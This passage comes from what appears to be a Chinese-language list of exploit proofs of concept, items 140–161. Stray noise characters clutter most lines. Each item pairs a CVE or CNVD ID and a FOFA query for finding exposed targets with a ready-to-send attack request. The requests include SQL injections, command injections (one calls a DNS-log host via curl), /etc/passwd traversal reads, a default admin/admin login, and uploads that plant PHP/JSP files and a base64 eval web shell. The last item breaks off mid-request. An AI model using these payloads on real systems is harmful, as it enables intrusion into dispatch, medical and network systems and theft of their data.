1 \/ P8 n. A) J9 S. TCVE-2024-26221 H2 A3 Q0 V/ o
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& i0 N* f" j1 T pGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1 _& P& p5 S( ~% P* W5 k$ G
Host: x.x.x.x1 Z5 s+ Q5 _8 Z8 g4 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! y8 D; ?; W# B/ }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 i. \5 y" O P! C$ Q, m; m5 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& y. I# L! f( y3 J" U3 v
Accept-Encoding: gzip, deflate, br
/ F% C: H* B! }; j' k+ SConnection: close
0 L7 g" c6 W2 P& f/ H2 KCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk" I+ }% }7 f: r2 N, d! [1 A5 _
Upgrade-Insecure-Requests: 1$ R8 b( p9 a9 l. l9 d9 a
& p7 U- Q6 Y, C5 |7 x1 H2 O/ u
0 p t0 S; l! H! r& S
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. D$ k( k, A& O f" E$ z) Q: RCVE-2024-2566
9 j( v8 o1 _( e3 b7 J" S# ~& C: CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台": p: T8 {5 E; P, {4 |8 p E
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ G9 s9 C- R3 Q6 F/ v; wHost: x.x.x.x
. W6 ]! t7 P" i6 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 Q7 K& J/ s( j4 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" {+ e9 a0 t n& v- ~6 t) G8 u# A% |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ m- |. E- G. W/ |Accept-Encoding: gzip, deflate, br, [' l& ?6 v8 y" X$ r( m6 }
Connection: close
' Y7 r; s: Y; @9 r& ]2 D2 X& DCookie: authcode=h8g9
- N% b- m. k* V+ YUpgrade-Insecure-Requests: 1: _- J! k% Y* M1 I
+ r, o' {" V! E- e; G. I1 h
* k# F# a7 `0 C# n. n$ `) X141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入6 _& D7 J0 I1 r( {1 z, y
FOFA:body="指挥调度管理平台"
- E$ a3 @5 c. `* ^/ r/ mPOST /app/ext/ajax_users.php HTTP/1.1
: o4 v4 y. F3 @; D i" QHost: your-ip& y% ]$ w% U7 C
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
8 v) B6 D# P! G4 A) l. e7 vContent-Type: application/x-www-form-urlencoded
1 V3 ?& p9 X+ s3 ~5 R) I
- K% f. B9 y! q a( ?9 E* K5 j6 D. j3 \0 K2 E9 T/ Y) ~6 w% w
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 G- F0 g& D9 E3 S" @: w$ u, X9 N
6 n8 j6 N& f0 p0 G, R5 A0 ]; e0 v
$ Y" R4 `6 R8 F, M( U0 A; ?142. CMSV6车辆监控平台系统中存在弱密码* Q) e9 l9 a- B2 N7 M, P6 v
CVE-2024-29666& j( ^; V G8 U! C2 J
FOFA:body="/808gps/"
- w @4 q0 d5 p6 iadmin/admin: m+ ~% B) Z, g( L
143. Netis WF2780 v2.1.40144 远程命令执行
$ ?8 D. |* T9 M. w7 dCVE-2024-25850! l, R$ }/ l' Q6 n, `5 ?
FOFA:title='AP setup' && header='netis'# @3 _( z7 |8 c& ?, Y+ D$ v2 u
PAYLOAD
8 h& e9 h* }0 U0 V: \7 o
! g# c% D3 g4 P! W; y144. D-Link nas_sharing.cgi 命令注入
# [; H4 A8 R* }4 q9 G/ O2 tFOFA:app="D_Link-DNS-ShareCenter"
6 a8 } B9 H$ \+ p1 e! L% Gsystem参数用于传要执行的命令9 |+ h% M9 q7 V( X. S C* |
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
, |5 ^8 E& D4 p2 w9 }3 ~5 tHost: x.x.x.x
4 e5 L( u8 V) P6 l( P9 iUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0. f3 f L' S3 J8 u% _7 ?
Connection: close
& d( A) W+ a7 ?6 VAccept: */*: Z( t* P9 b- w. v# e
Accept-Language: en# @. I, K- Q) n4 z; L
Accept-Encoding: gzip
4 a; O" D1 D D. O5 F6 {0 N1 ?: l2 E. \' `2 z: i5 B6 B
& u4 @$ `- Z+ E! r$ V' o
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入& w9 L9 ], f4 ?0 g
CVE-2024-34001 D# O* ~/ @/ W U, r! v* ~; ^
FOFA:icon_hash="-631559155"8 H0 H( v& W+ f; y
GET /global-protect/login.esp HTTP/1.1! I4 k! G, @2 @$ [( Z
Host: 192.168.30.112:1005
3 Q+ R$ V: G5 x% E9 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84# }: b! K( n J/ B+ W& n
Connection: close: V: x$ i- n, w
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
& I6 M1 G2 W# C$ M6 `0 L5 m0 ~Accept-Encoding: gzip/ A+ k1 u/ _( a
5 ^$ o' M/ P, D! k
s* k/ J+ P& h, ~% ?: B146. MajorDoMo thumb.php 未授权远程代码执行: j3 k" N1 \- C
CNVD-2024-02175
( n2 B: Z4 l$ [9 k0 Z5 dFOFA:app="MajordomoSL"
0 S" m- {+ c j4 WGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
( O# @: _$ e6 X- hHost: x.x.x.x
7 H7 u7 x* N' m, BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.847 |. `7 A6 }! O/ R% i% l
Accept-Charset: utf-84 |# C Z' i) ?
Accept-Encoding: gzip, deflate
! F" F* U$ u* Y9 W' cConnection: close
2 l) Y6 S6 v9 S; o. L( i* q( [; o% i4 N
( f) M& W: }' w5 B' j3 l2 F
6 C' Q/ R! f! V9 t: o' a0 o147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
9 p5 V" q6 G h# fCVE-2024-32399- h, n* n* z; r& I+ `6 y/ z2 O
FOFA:body="RaidenMAILD"" |; N# h% f2 b
GET /webeditor/../../../windows/win.ini HTTP/1.1
0 _- E4 J0 n% O2 u+ ^. YHost: 127.0.0.1:81+ Y' E' F! i# W$ q" B
Cache-Control: max-age=0
6 K1 Z5 |" J4 d7 f+ LConnection: close' M# V' D6 j5 L3 G! l- |& k
1 D" g# Y( C `; x. U P+ d
4 Q+ B% ~/ U& \- t148. CrushFTP 认证绕过模板注入; h- E! ?+ z' [# B9 @# N& _& F g
CVE-2024-4040
4 l$ Q2 q" [1 n, uFOFA:body="CrushFTP"
) w3 @9 F* ?8 U, k9 PPAYLOAD
8 ~# e: W; l' p) b+ [! E! f7 x8 l5 \) z. B
149. AJ-Report开源数据大屏存在远程命令执行% C9 s* F, u/ ]0 k0 F% p* p
FOFA:title="AJ-Report". b" ]- U' A2 R `# t
# f. z) j7 }$ h5 O) YPOST /dataSetParam/verification;swagger-ui/ HTTP/1.10 t3 M6 Z$ d j, y4 G( I
Host: x.x.x.x9 _; w/ s/ c4 R6 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; N6 [/ B, f' l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- z5 \3 B2 N3 T3 Q& W
Accept-Encoding: gzip, deflate, br
|* f6 ?; d% d. D! mAccept-Language: zh-CN,zh;q=0.9& }" c- [8 }' h3 t! F- a
Content-Type: application/json;charset=UTF-86 H' \. k. U, T( E2 u6 w K
Connection: close8 h4 e$ D2 |, D# I
* H: d% c6 l3 }4 J# g; [1 [. j x8 g0 f{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
" z* e* z0 k M0 `3 \0 n3 s
; i1 r! G! Z) [2 ~0 i2 Q150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 O0 ^! s& z6 bFOFA:title="AJ-Report". l- k8 {' ]" }8 N+ e
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& C" `# H) L: C$ R/ t
Host: x.x.x.x
; j3 ^3 l4 z/ e( k0 W$ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ B1 m6 @! Z& w5 w1 e% J o: [( U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 C" v% d5 ?! h2 }
Accept-Encoding: gzip, deflate, br o: ]0 Q8 p7 }5 g9 N
Accept-Language: zh-CN,zh;q=0.9
# a# H$ M$ E4 T M# m5 T; B0 BContent-Type: application/json;charset=UTF-8
1 H+ P' ]8 V5 ?/ cConnection: close
! D" e2 i2 z: n! u; wContent-Length: 339
$ u- i0 y% ]3 u# J( O" C
H. ~# a! r" v$ i- c) @! S% e1 r{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: J; f" l5 y, q2 T9 [
9 C) Y# P; }. O4 S" U( G( s" v& b9 f5 k( r2 V" _
151. AJ-Report 1.4.1 pageList sql注入
k- F( S3 D4 |( o% {: a1 D4 sFOFA:title="AJ-Report") H( S0 ~ J1 v/ L$ B" u
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
9 t, R2 r1 g5 D6 W. w oHost: x.x.x.x9 O& T" s6 F3 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 H v0 }) | _# f5 VConnection: close0 e, N+ q3 O% d, y7 A' |
Accept-Encoding: gzip
; c U( B z$ U. L) O! t7 t6 A& s8 r4 D7 n
. u3 Y3 b2 H$ Y) t( d; o# H# v152. Progress Kemp LoadMaster 远程命令执行
+ \ l2 c8 A( c( qCVE-2024-1212+ W! u8 e! h; |# r+ t( G% y
LoadMaster <= 7.2.59.2 (GA)" B" s8 T% W8 H% h) n
LoadMaster<=7.2.54.8 (LTSF)' p8 i% J6 {1 l5 g* l
LoadMaster <= 7.2.48.10 (LTS)
. w; d# R6 Y$ O$ CFOFA:body="LoadMaster"
2 @5 L* `3 ^+ X1 c8 i, rJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( F) ^" G7 F& D: Q9 V3 m' N$ v+ E
GET /access/set?param=enableapi&value=1 HTTP/1.16 z3 H, Y* f6 h1 A1 S( j
Host: x.x.x.x
0 V( x, d5 [. R- y, zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1. [1 W1 B8 ?: V7 Y$ q
Connection: close
3 D1 h; ?8 E" Q9 j% qAccept: */*) D( {7 K: b3 Z- j( _( }$ S6 t- O
Accept-Language: en' l; ^+ m2 E& e3 q* e* N
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=- Y+ H0 H, U# J8 I
Accept-Encoding: gzip
9 s0 n# v! ?/ q6 w& Z, t
/ s9 {8 L# }8 I3 R; ^! C
4 u+ l* g* B/ {5 z' ^6 C153. gradio任意文件读取* o5 w9 A8 P- B6 f
CVE-2024-1561FOFA:body="__gradio_mode__"7 w6 ?6 W1 l# D# T" }, Z$ x0 J
第一步,请求/config文件获取componets的id
+ ?0 { B& c8 F) d1 |http://x.x.x.x/config4 d* w( t5 \" e0 `. O# K6 R% }. N
& N9 f& ~# t J5 `& k7 P! P c. C4 G# J8 O
第二步,将/etc/passwd的内容写入到一个临时文件
+ }, W5 ` s( R1 U, y0 OPOST /component_server HTTP/1.1( W* z0 f* j( c8 l' j9 H0 A
Host: x.x.x.x3 j; u0 ^8 g# y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
5 }. b; U% l- F1 b, _Connection: close2 N9 N I# @: l0 _! Q* G2 F: I
Content-Length: 1155 A- P8 g2 _7 `+ L+ p
Content-Type: application/json- O, p6 y4 U" e+ k `7 [/ k
Accept-Encoding: gzip
6 k3 j7 |9 [- _3 k# L% T1 F# ~
; R2 ^$ n; g( [{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" K3 b% z) \! ]- ?7 W& b; U3 ?8 [4 ~5 h- u" h8 j6 C2 J; X! D$ f
4 D! L4 m/ O$ g. s第三步访问
* {% n( ^) o F! F5 K/ B6 x/ Zhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd6 k G: R( n# d' X
& j5 x1 w! F/ o! W! B: c3 `% g, g% I1 o! W# g$ @7 E6 y
154. 天维尔消防救援作战调度平台 SQL注入6 r- h% w; ~& k* r- @- W3 |. a
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入": W+ d m( h( U0 k* H' h
POST /twms-service-mfs/mfsNotice/page HTTP/1.1$ w w. z! O0 d
Host: x.x.x.x
1 f- ^+ I7 {( F. X0 R! q$ nContent-Length: 106% H( p/ L) `) Z1 R
Cache-Control: max-age=0* o* g% M& b; E4 v+ Q; e
Upgrade-Insecure-Requests: 1$ |0 r( z Y0 b3 F3 |
Origin: http://x.x.x.x. @# `, o5 d! |( M* \. c
Content-Type: application/json3 A; e( x, }/ u5 h; E8 j v) ^4 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36# W0 T; _1 C" S$ B: S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% a9 m/ G. v3 pReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
" ~0 M) e# V' U& v9 {Accept-Encoding: gzip, deflate2 O0 s/ U9 b# f$ s" j$ v+ E
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7( B+ c( `" V5 E
Connection: close
+ {( I1 e+ |: e0 x
7 `. _6 }# _: g& R! G{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
/ O! y" N6 ]% F* X0 ]- E% Q/ y) X9 z, E J
: N. ?! g2 m1 u- q: o: e155. 六零导航页 file.php 任意文件上传
& C F, K& U" e" x3 ]; fCVE-2024-34982
( D( E1 }$ A; u: D4 B3 S! ?FOFA:title=="上网导航 - LyLme Spage"6 M0 Z% r5 p% c
POST /include/file.php HTTP/1.10 G6 u, \* ^ o# X
Host: x.x.x.x
8 [2 D" J& v/ `9 n# F9 s$ F9 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* m% R! r2 g+ ?( ^7 M/ f, ^
Connection: close
/ {8 c$ T7 x+ A8 y2 L2 X# AContent-Length: 232* `% o* S3 s1 d3 V% I8 k* V
Accept: application/json, text/javascript, */*; q=0.01, m5 T0 i: T; ^$ i) C
Accept-Encoding: gzip, deflate, br
9 f+ w1 Q0 D+ O, oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' Q9 G g0 D; i7 T
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f; r1 G! ]( v* f5 N5 B6 q
X-Requested-With: XMLHttpRequest
3 P) Z B7 [& `; v4 m. ^, |' j3 C% q8 A3 V' l
-----------------------------qttl7vemrsold314zg0f6 V0 k `) F; [" t/ m. K6 Z2 p% @
Content-Disposition: form-data; name="file"; filename="test.php"' h: G/ K) j' {! l$ ~; O% }
Content-Type: image/png* f* r8 t4 h/ P' m
3 X1 T( Y# R% h) l: z<?php phpinfo();unlink(__FILE__);?>+ X# }/ h& v; H
-----------------------------qttl7vemrsold314zg0f--) a/ L" m9 F/ u7 A/ y- p, e
* W7 D; A1 {' T# ?3 a! F7 _& m3 F( ~ V/ G b1 ^% {/ R
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php, A% j0 |8 ~, V( z) }
6 g: j& |) m/ p8 r9 [4 g1 ], I: i
156. TBK DVR-4104/DVR-4216 操作系统命令注入) z+ O/ H# X: T* s
CVE-2024-3721( @5 x; j/ h2 {0 u0 h$ g
FOFA:"Location: /login.rsp"" b; T4 w. h$ Z- R0 B' F* D+ r% Y
·TBK DVR-4104
8 U3 Y% M0 r9 p! S·TBK DVR-4216
3 u" J! \, |7 {! g( d* B1 |curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& x S) b# P/ N( s& V, |
0 f% {5 \1 @5 C- P7 [* E
- F, L) n( `. V& {" f; wPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.10 p& k& D+ H n! v7 V9 f
Host: x.x.x.x
# b) P+ V4 H7 G; xUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 i# g3 u% [; ]9 CConnection: close- f3 c+ @, P- j+ S3 q( O5 K
Content-Length: 0
/ b2 ^2 ~; I. G6 h3 `% L WCookie: uid=1
! k9 g! r7 ^6 _4 m# H5 zAccept-Encoding: gzip- ]3 V! w; [% n
+ {% V! z& D8 V2 E% `( T- l, V* t% F' i J! w% ~( h
157. 美特CRM upload.jsp 任意文件上传
7 [; h" m0 T: WCNVD-2023-06971 O4 A8 Y5 T2 i1 `; Q
FOFA:body="/common/scripts/basic.js"
' }2 c9 D( g" H: h5 ]& X' xPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
1 s9 Y0 X% v! J0 t; C- n" jHost: x.x.x.x
! f7 l2 W: M3 b9 H( `$ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 X7 S' @; c# @' J6 gContent-Length: 7094 Q- g/ I! G1 W$ F/ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 W* E, G9 s9 {8 D( W( b! \
Accept-Encoding: gzip, deflate& Q3 Q+ f8 ?8 B. \+ J; h0 F) T& d
Accept-Language: zh-CN,zh;q=0.9
: B- @7 Y: ^6 z3 x# [: ?3 e9 y0 CCache-Control: max-age=0
. d* F1 Q! J, d, S0 x) RConnection: close1 ?+ r! X% {9 [! ?$ b$ X+ X( z0 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
% Y, S7 K9 c* Y( H- n( ?Upgrade-Insecure-Requests: 1! V: H& p5 L& f% w2 f4 M1 p) z
6 ]4 L' u, m. t9 d. y0 Y------WebKitFormBoundary1imovELzPsfzp5dN' u* D- E( G# G7 ~' b" E8 f9 g
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"' y* S& O4 i, x* B" A
Content-Type: application/octet-stream
$ r4 T( S3 B: k, E# J+ ~! D( i
+ B2 T9 \# L0 }8 Znyhelxrutzwhrsvsrafb6 P5 |0 G+ Z4 }+ _
------WebKitFormBoundary1imovELzPsfzp5dN7 k" \# x9 c/ T; ?- R$ W' Q
Content-Disposition: form-data; name="key"
P. [8 o8 C8 ^4 Z( B
- k H% W2 u2 v- L$ Q1 t; Xnull
% l( [" ~8 v4 t2 c/ }. X( P------WebKitFormBoundary1imovELzPsfzp5dN- ? X, h( p- ~
Content-Disposition: form-data; name="form"
" N' R V2 V) a1 i7 [) n0 h
# H0 L( M. q4 o! Ynull
4 ]% W) ]+ b: i8 O------WebKitFormBoundary1imovELzPsfzp5dN4 T/ `4 }! l; W) C
Content-Disposition: form-data; name="field"
f2 S$ v& X7 P# D- w$ U0 n
' d$ u6 @8 k2 S0 R- W. tnull
& Q! m7 K B4 [' ]! r------WebKitFormBoundary1imovELzPsfzp5dN
; B: c6 O" J5 L9 v* C9 i; W& FContent-Disposition: form-data; name="filetitile"
, x, l7 r g8 m. K+ B2 r% r) J+ \* q& j+ O
null2 p m& \, Y) `9 q+ b
------WebKitFormBoundary1imovELzPsfzp5dN! e( P2 q9 n4 D
Content-Disposition: form-data; name="filefolder"" F# t" w0 O8 w4 E1 p+ W- t
% d' I' y3 x% l( O- x5 Fnull
. C1 Q0 n; L# }& [------WebKitFormBoundary1imovELzPsfzp5dN--
0 [. d% a# o& T6 d) E
/ ^$ `1 U' W5 K. B
: o+ V9 W9 L% A: B- V& | khttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
) M5 q+ z4 ^, ~3 J1 l/ B4 g
) `) x5 u# ~0 n. \( q% d158. Mura-CMS-processAsyncObject存在SQL注入
( o8 Q4 f9 D0 a. |; p8 jCVE-2024-32640
5 J: }+ ^1 D" ^- g2 ?) vFOFA:"Generator: Masa CMS"
6 o5 l# n. l- _# PPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
* Q7 i$ i& S0 m# @- Q$ ?: wHost: {{Hostname}}2 e7 @, i; b' }
Content-Type: application/x-www-form-urlencoded7 q( o3 A) n" M- A7 P) W1 f
# @' L9 ?4 ~) G/ v4 S3 W* a; a6 I
object=displayregion&contenthistid=x\'&previewid=16 Z6 c" V. G: N
; @- ?# p% i" p) f, D; z
+ X2 v2 \$ r: j159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传- ]% `" @* ]& B6 d+ \4 N5 w
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")' i6 }4 B9 x% ^- n2 ` }
POST /webservices/WebJobUpload.asmx HTTP/1.18 ~1 P; F2 T5 l1 F- n7 I4 X3 a9 l
Host: x.x.x.x
+ E9 s1 O: T& rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
9 J, S$ s- C. ^Content-Length: 1080, u' |; y+ I4 C! ^5 P6 { K r
Accept-Encoding: gzip, deflate
m# t3 S7 v4 _9 ~Connection: close- t0 ^+ i+ L, j2 S1 ?! L6 G! d* h- p
Content-Type: text/xml; charset=utf-8
& N5 J% H7 I6 W9 V6 ~+ D' S3 ~* b; ~# OSoapaction: "http://rainier/jobUpload"- j; l' n" P( c0 M- O* q( s
V5 ]& Z. k& {6 R; `& t# y<?xml version="1.0" encoding="utf-8"?>1 J" j3 h8 g" N' |) X
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ `& p5 i7 s9 w6 j<soap:Body>6 @& w4 C9 O' R; D- G. C: k0 W
<jobUpload xmlns="http://rainier">
3 E% _9 i% E4 o. f' R' U<vcode>1</vcode>
8 S+ Q/ l. G+ [<subFolder></subFolder>7 B, _$ }7 p9 m% z, |7 y) ~% ~$ y
<fileName>abcrce.asmx</fileName>6 r3 I$ R1 [6 w) y! i) g
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>) M# a; i; a& w2 A
</jobUpload>
/ W5 \! s; }0 q2 @</soap:Body>
* r7 p5 t& [5 f6 H) E</soap:Envelope>9 l* Z' A4 w( u
3 ?; }4 V( C; k. Y
9 T2 s5 e6 H# l8 `+ ~2 c
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
/ R+ ^" g+ ?3 o' B5 s1 e
- e( H4 [2 [0 C: j% x4 W. f$ N4 S- A, s2 \9 u2 z' u" ^ `
160. Sonatype Nexus Repository 3目录遍历与文件读取4 u8 D, r! E1 d( [/ [
CVE-2024-4956
5 N8 }5 I( \0 g$ p' kFOFA:title="Nexus Repository Manager"
0 }8 P+ d! _+ L% ]% }9 P" wGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" ]. U. p& }( O4 h9 _1 q* P( B
Host: x.x.x.x* g. K5 n. Q4 k/ z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
/ d0 W e8 ~. A: lConnection: close3 w% n! {. @0 p2 g$ f8 ~7 k* m
Accept: */*( [6 ~% ~+ R# V5 V3 Y( F
Accept-Language: en
& t6 V D0 Q! ^Accept-Encoding: gzip
2 V6 d# `6 b8 s% O' ~ v; K |! Y( }' W* R% X+ {: |+ p- ~0 L
2 G3 H; [1 J. ~" @0 ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 g, t P. s* IFOFA:body="/KT_Css/qd_defaul.css"
4 K z6 h% \: b3 E8 |* u; [8 H第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密, O3 q; h& ~" N5 t" Z8 ^/ ?
POST /Webservice.asmx HTTP/1.1& _9 Z' U: k; e) s9 j
Host: x.x.x.x
$ ?% h" E8 o0 |0 [$ A wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 F3 R" v+ r* H, v* d
Connection: close! m' j N0 p b+ Q
Content-Length: 4453 H+ \$ p! r! i+ X% ~* \/ z
Content-Type: text/xml
6 `$ ^0 G& B- G pAccept-Encoding: gzip
2 ]4 W8 ^- g. v, Y0 N' h1 z: M
, D6 O, U R/ ?8 W+ d Y<?xml version="1.0" encoding="utf-8"?>% D6 O: C5 E$ b4 E% q
<soap:Envelope xmlns:xsi="1 E$ i& f) X9 i% L" d* }
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
1 O" [8 b I, d/ o9 B& @) fxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) m# Z/ x! y8 n<soap:Body>
0 M9 y+ B! I8 }' }<UploadResume xmlns="http://tempuri.org/">
